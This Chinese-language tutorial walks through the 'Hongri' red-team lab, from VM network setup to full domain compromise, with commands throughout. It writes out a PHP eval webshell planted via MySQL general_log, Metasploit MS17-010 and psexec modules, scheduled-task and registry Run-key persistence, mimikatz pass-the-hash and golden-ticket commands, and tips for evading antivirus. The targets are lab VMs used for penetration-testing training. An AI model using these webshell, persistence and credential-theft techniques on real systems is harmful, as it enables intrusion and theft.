当前位置: 首页 > news >正文

新手也能懂的红队实战:从零搭建红日靶场到内网渗透完整复盘(附环境包)

红队实战入门:从零构建红日靶场到内网渗透全流程解析

环境准备与靶场搭建

红日靶场作为国内知名的渗透测试学习环境,其设计模拟了真实企业内网架构,包含Web服务器、域控服务器和域成员主机。对于初学者而言,正确搭建环境是后续所有操作的基础。我们先从虚拟机配置开始:

网络拓扑关键点

  • Web服务器(Windows 7)需要配置双网卡:
    • NAT模式:192.168.134.135(外部访问)
    • VMnet1:192.168.52.143(内网通信)
  • 域控服务器(Windows Server 2008):192.168.52.138
  • 域成员主机(Windows Server 2003):192.168.52.141

注意:所有虚拟机默认密码为hongrisec@2019,建议在实验环境中使用,正式环境必须修改

常见搭建问题解决方案:

问题现象可能原因解决方法
虚拟机无法联网网卡模式错误检查VMnet1是否启用Host-Only模式
靶机之间ping不通防火墙未关闭执行netsh advfirewall set allprofile state off
服务无法启动系统时间错误调整虚拟机时间至2019年左右

信息收集与漏洞探测

完整的渗透测试中,信息收集往往占据70%的工作量。在红日靶场中,我们需要采用分层递进的收集策略:

  1. 基础信息扫描
whatweb http://192.168.52.143 # 识别Web框架 dirsearch -u http://192.168.52.143 -e php # 目录扫描
  1. 关键发现处理
  • 发现phpMyAdmin后台时,应立即检查版本:
-- 通过文档文件判断版本 SELECT @@version; -- 检查导出权限 SHOW VARIABLES LIKE 'secure_file_priv';
  1. 突破点选择矩阵
漏洞类型利用难度适用场景工具推荐
弱口令爆破★★☆存在登录接口Burp Suite
目录遍历★☆☆存在索引漏洞御剑扫描器
SQL注入★★★存在查询接口sqlmap

权限获取与维持

通过phpMyAdmin获取Webshell是本次渗透的关键转折点,具体实现路径:

日志写入法详细步骤

  1. 开启全局日志记录:
SET global general_log = 'ON'; SET global general_log_file = 'C:/phpStudy/WWW/shell.php';
  1. 写入恶意代码:
SELECT '<?php @eval($_POST[cmd]);?>';
  1. 使用蚁剑连接时需注意:
  • 选择PHP类型连接
  • 编码设置为UTF-8
  • 超时时间调整为30000ms

经验提示:内网环境中,建议优先使用冰蝎等工具,其流量特征更隐蔽

权限提升检查清单:

  • [ ] 查看系统补丁:systeminfo
  • [ ] 检查服务权限:accesschk.exe -uwcqv "Authenticated Users" *
  • [ ] 查找敏感文件:dir /s *pass* == *.config

内网横向移动实战

获取立足点后,内网渗透需要系统化的推进策略:

域环境侦查命令集

net group "Domain Admins" /domain # 查询域管理员 nltest /domain_trusts # 查询域信任关系 nslookup -type=SRV _ldap._tcp # 定位域控制器

MS17-010漏洞利用优化方案

  1. 使用Metasploit进行精准探测:
use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.52.141 set THREADS 3 run
  1. 漏洞利用失败时的备选方案:
  • 尝试psexec远程执行:
use exploit/windows/smb/psexec set SMBPass hongrisec@2019 set SMBUser Administrator

权限维持技巧

  • 创建计划任务:
schtasks /create /tn "Update" /tr "C:\shell.exe" /sc minute /mo 1
  • 注册表自启动:
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Backup" /t REG_SZ /d "C:\shell.exe"

域控攻防与总结

在最终获取域控权限的过程中,有几个关键转折点值得注意:

  1. 哈希传递攻击(PTH)
sekurlsa::pth /user:Administrator /domain:god.org /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0
  1. 黄金票据制作
kerberos::golden /admin:Administrator /domain:god.org /sid:S-1-5-21-1218 /krbtgt:310b643c5316c8c3c70a10cf8365e /ticket:golden.kirbi

实战中遇到的典型问题及解决记录:

  • 域控防火墙规则拦截:通过已控主机执行netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=TCP localport=3389
  • 杀软拦截mimikatz:使用免杀版本或改用powershell版本
  • 横向移动速度慢:设置set AutoRunScript post/windows/manage/migrate自动迁移进程
http://www.jsqmd.com/news/627029/

相关文章:

  • intv_ai_mk11 GPU算力适配案例:A10显存16GB下7B模型量化部署实操
  • 【OpenClaw】通过 Nanobot 源码学习架构---()总体悼
  • GVector:嵌入式轻量二维向量库深度解析
  • 2026年靠谱的防盗门窗/铝合金平开门窗/防火门窗/防紫外线门窗厂家选择指南 - 品牌宣传支持者
  • 用C++的string类手搓一个大整数加法器(附完整可运行代码)
  • Qwen3.5-9B-AWQ-4bit辅助Multisim电路仿真:元件选型与故障分析
  • QWEN-AUDIO内容创作提效:营销文案→自然语音→一键导出WAV全流程
  • 从标准到实践:基于IPC-9702与IPC-9704A的PCB应力应变测试全流程解析
  • 2026年4月国内回收乙醇实力厂家,回收乙醇/食用酒精/回收废乙醇/回收酒精/回收异丙醇/工业酒精,回收乙醇厂商手机 - 品牌推荐师
  • Agentbed:嵌入式轻量级SNMP代理库深度解析
  • 用C语言和TCP手搓一个Linux聊天室:从socket()到select()的完整踩坑实录
  • LLM推理优化核心技术:KV Cache、FlashAttention与显存管理深度解析
  • 算法——暴力+优化
  • .NET源码生成器基于partial范式开发和nuget打包欧
  • Pixel Epic · Wisdom Terminal 远程开发环境配置:使用MobaXterm高效管理GPU服务器与模型服务
  • 记一次综合型流量分析 | 添柴不加火釉
  • Formily企业级表单解决方案:分布式状态管理与高性能架构的终极实践
  • Spring Boot WebFlux 性能调优技巧
  • 深入解析802.3ad动态链路聚合:LACP配置与常见问题排查
  • 从ZDT到DTLZ:多目标优化算法‘高考卷’的设计哲学与实战选型指南
  • 《数论探微:进阶版》(Arithmetic Tales: Advanced Edition)敦
  • OpenWrt下实现USB转串口驱动的配置与调试
  • 下一个任务-----利用辅助服务自动关掉app广告
  • 工业场景下安全监控相关目标检测模型开发 工人安全装备(防弧面罩、帽子)识别、危险源(火花、火种)检测 工程机械(推土机、起重机、装载机数据集设施(配电箱、放电台)、物资(罐子、颜料、轮胎)的识别与计数
  • 5分钟掌握HMCL:你的跨平台Minecraft启动器终极指南
  • ESP平台LittleFS嵌入式文件系统工程化封装库
  • 丹青识画真实案例:杭州西溪湿地游客自拍生成‘烟雨江南’题跋
  • 【LaTeX】数学建模论文高效排版技巧:定理引用、三线表与伪代码实战
  • 前端沙箱机制
  • 告别手动配置:用Rook Operator在K8s中自动化管理Ceph存储(RBD/CephFS/CSI实战)